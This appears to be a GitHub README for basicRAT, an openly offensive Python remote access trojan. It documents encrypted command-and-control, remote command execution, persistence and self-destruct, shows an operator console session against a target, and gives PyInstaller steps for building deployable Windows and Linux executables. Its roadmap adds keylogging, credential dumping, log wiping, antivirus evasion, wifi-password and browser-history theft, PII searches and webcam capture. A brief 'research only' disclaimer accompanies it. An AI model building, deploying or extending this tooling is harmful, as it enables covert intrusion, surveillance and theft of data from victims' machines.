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114 lines (95 loc) · 4.71 KB

File metadata and controls

114 lines (95 loc) · 4.71 KB


This is a cross-platform Python 2.x Remote Access Trojan (RAT), basicRAT was created to maintain a clean design full-featured Python RAT. Currently a work in progress and still being actively hacked on.

Disclaimer: This RAT is for research purposes only, and should only be used on authorized systems. Accessing a computer system or network without authorization or explicit permission is illegal.


  • Cross-platform (Windows, Linux, and macOS)
  • AES-256 encrypted C2 with D-H exchange
  • Accepts connection from multiple clients
  • Command execution
  • Standard utilities (cat, ls, pwd, unzip, wget)
  • System survey
  • Self-destruct
  • Primitive port scanning
  • Client reconnect


$ python --port 1337

 ____    ____  _____ ____   __  ____    ____  ______      .  ,
|    \  /    |/ ___/|    | /  ]|    \  /    ||      |    (\;/)
|  o  )|  o  (   \_  |  | /  / |  D  )|  o  ||      |   oo   \//,        _
|     ||     |\__  | |  |/  /  |    / |     ||_|  |_| ,/_;~      \,     / '
|  O  ||  _  |/  \ | |  /   \_ |    \ |  _  |  |  |   "'    (  (   \    !
|     ||  |  |\    | |  \     ||  .  \|  |  |  |  |         //  \   |__.'
|_____||__|__| \___||____\____||__|\_||__|__|  |__|       '~  '~----''

basicRAT server listening for connections on port 1337.

[?] basicRAT> help

cat <file>          - Output a file to the screen.
client <id>         - Connect to a client.
clients             - List connected clients.
execute <command>   - Execute a command on the target.
goodbye             - Exit the server and keep all client connections alive.
help                - Show this help menu.
kill                - Kill the client connection.
ls                  - List files in the current directory.
persistence         - Apply persistence mechanism.
pwd                 - Get the present working directory.
quit                - Exit the server and destroy all client connections.
rekey               - Regenerate crypto key.
scan <ip>           - Scan top 25 TCP ports on a single host.
selfdestruct        - Remove all traces of the RAT from the target system.
survey              - Run a system survey.
unzip <file>        - Unzip a file.
wget <url>          - Download a file from the web.

[?] basicRAT> clients
ID - Client Address
 1 -

[?] basicRAT> client 1
Client 1 selected.

[1] basicRAT> execute uname -a
Running execute...
Linux meerkat 4.10.13-1-ARCH #1 SMP PREEMPT Thu Apr 27 12:15:09 CEST 2017 x86_64 GNU/Linux

execute completed.

Build a stand-alone executable

Keep in mind that before building you will likely want to modify both the HOST and PORT variables located at the top of to fit your needs.

On Linux you will need Python 2.x, PyInstaller, and pycrypto. Then run something like pyinstaller2 --onefile and it should generate a dist/ folder that contains a stand-alone ELF executable.

On Windows you will need Python 2.x, PyInstaller, pycrypto, pywin32, and pefile. Then run something like C:\path\to\PyInstaller-3.2\PyInstaller-3.2\ --onefile and it should generate a dist/ folder that contains a stand-alone PE (portable executable).


  • Interactive shell
  • Client binary generation tool (cross-platform)
    • Pyinstaller
    • Switch options for remote IP, port, etc
  • Persistence (cross-platform)
    • Windows: Registry keys, WMIC, Startup Dir
    • Linux: cron jobs, services, modprobe
    • macOS: LaunchAgent, LaunchDaemons
  • Privilege Escalation (getsystem-esque, dirty cow)
  • Common C2 Protocols (HTTP, DNS)
  • Clean log files
    • Linux: bash history, var logs, audit logs, etc
    • Windows: Event logs, prefetch, etc
  • Screenshot
  • Keylogger
  • Expand toolkit (unrar, sysinfo)
  • Scanning utilities (probe scan / ping sweep, scanning subnet)
  • Password dumping (mimikatz / gsecdump)
  • Tunneling / Pivoting (ssh)
  • Anti-virus detection and evasion
  • VM and Sandbox detection
  • Exfil browser history
  • Search file system for sensitive information using regex
    • addresses, credit cards numbers, socials, PII, etc
  • Detect web cameras and take snapshots
  • Steal wifi passwords



  • @bozhu, AES-GCM Python implementation.
  • @reznok, multiple client connection prototype.

Other open-source Python RATs for Reference